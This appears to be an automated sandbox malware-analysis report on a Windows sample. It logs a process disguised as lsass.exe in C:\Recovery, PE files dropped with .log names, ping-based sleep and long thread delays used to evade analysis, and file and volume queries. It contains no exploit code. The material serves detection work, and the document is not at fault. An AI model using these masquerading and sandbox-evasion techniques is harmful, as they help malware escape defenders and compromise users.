Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\lsass.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Memory allocated: 1190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Memory allocated: 1AE40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\lsass.exe	Memory allocated: 27B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\lsass.exe	Memory allocated: 1A7B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\lsass.exe	Memory allocated: 1790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\lsass.exe	Memory allocated: 1B2A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\lsass.exe	Memory allocated: 28D0000 memory reserve \| memory write watch
Source: C:\Recovery\lsass.exe	Memory allocated: 1A8D0000 memory reserve \| memory write watch
Source: C:\Recovery\lsass.exe	Memory allocated: 28D0000 memory reserve \| memory write watch
Source: C:\Recovery\lsass.exe	Memory allocated: 1A8D0000 memory reserve \| memory write watch
Source: C:\Recovery\lsass.exe	Memory allocated: 2A30000 memory reserve \| memory write watch
Source: C:\Recovery\lsass.exe	Memory allocated: 1AA30000 memory reserve \| memory write watch
Source: C:\Recovery\lsass.exe	Memory allocated: 7E0000 memory reserve \| memory write watch
Source: C:\Recovery\lsass.exe	Memory allocated: 1A6A0000 memory reserve \| memory write watch
Source: C:\Recovery\lsass.exe	Memory allocated: 2EE0000 memory reserve \| memory write watch
Source: C:\Recovery\lsass.exe	Memory allocated: 1AEE0000 memory reserve \| memory write watch
Source: C:\Recovery\lsass.exe	Memory allocated: 9B0000 memory reserve \| memory write watch
Source: C:\Recovery\lsass.exe	Memory allocated: 1A8A0000 memory reserve \| memory write watch
Source: C:\Recovery\lsass.exe	Memory allocated: 2A00000 memory reserve \| memory write watch
Source: C:\Recovery\lsass.exe	Memory allocated: 1AA00000 memory reserve \| memory write watch
Source: C:\Recovery\lsass.exe	Memory allocated: 34A0000 memory reserve \| memory write watch
Source: C:\Recovery\lsass.exe	Memory allocated: 1B4A0000 memory reserve \| memory write watch

Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\lsass.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\lsass.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\lsass.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\lsass.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\lsass.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\lsass.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\lsass.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\lsass.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\lsass.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\lsass.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\whSGRYvh.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CmKYhHkf.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HInMzsNO.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gtMhCYIK.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oZQzjlbX.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CYkgyfvY.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XVlEhDHN.log	Jump to dropped file
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AFUvvHdz.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EaXPTOzT.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XmyUnkUi.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LkfFbrxk.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uhqhlNja.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\dhGiqFYl.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MhHNxrMf.log	Jump to dropped file
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PgRkIPoV.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\phNJAZcc.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\brdjWOxr.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JeCeCscc.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qjmAjDHY.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RIKTmlsJ.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nDKQhfgz.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YBBlCWWw.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GQmWAABO.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\icHKrlAV.log	Jump to dropped file
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iAcIGVjp.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UynSGdTD.log	Jump to dropped file
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZPkAsstD.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tIBixNUy.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MtSmEjDp.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UKBLugCN.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kwMHLMmE.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FrxXNAmm.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TBLKldEI.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CKyWUHyH.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QrHcjUSw.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gVSkXNZP.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nPayaidT.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gvHJzrMq.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\reDyPeef.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ryfhxvpx.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\heJamQmd.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vXhOtgDl.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AsWoiMty.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QXsvSdGP.log	Jump to dropped file

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_0-23731

Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe TID: 2140	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\lsass.exe TID: 4476	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Recovery\lsass.exe TID: 6380	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\lsass.exe TID: 4456	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Recovery\lsass.exe TID: 2692	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\lsass.exe TID: 3236	Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\lsass.exe TID: 2416	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\lsass.exe TID: 5316	Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\lsass.exe TID: 6696	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\lsass.exe TID: 5184	Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\lsass.exe TID: 2004	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\lsass.exe TID: 1168	Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\lsass.exe TID: 2200	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\lsass.exe TID: 5644	Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\lsass.exe TID: 2008	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\lsass.exe TID: 504	Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\lsass.exe TID: 2920	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\lsass.exe TID: 1516	Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\lsass.exe TID: 2344	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\lsass.exe TID: 3128	Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\lsass.exe TID: 4284	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\lsass.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\lsass.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\lsass.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\lsass.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\lsass.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\lsass.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\lsass.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\lsass.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\lsass.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\lsass.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BBA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_00BBA69B
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BCC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_00BCC220

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe

Code function: 0_2_00BCE6A3 VirtualQuery,GetSystemInfo,

0_2_00BCE6A3

Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\lsass.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\lsass.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\lsass.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\lsass.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\lsass.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\lsass.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\lsass.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\lsass.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\lsass.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\lsass.exe	Thread delayed: delay time: 922337203685477

Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
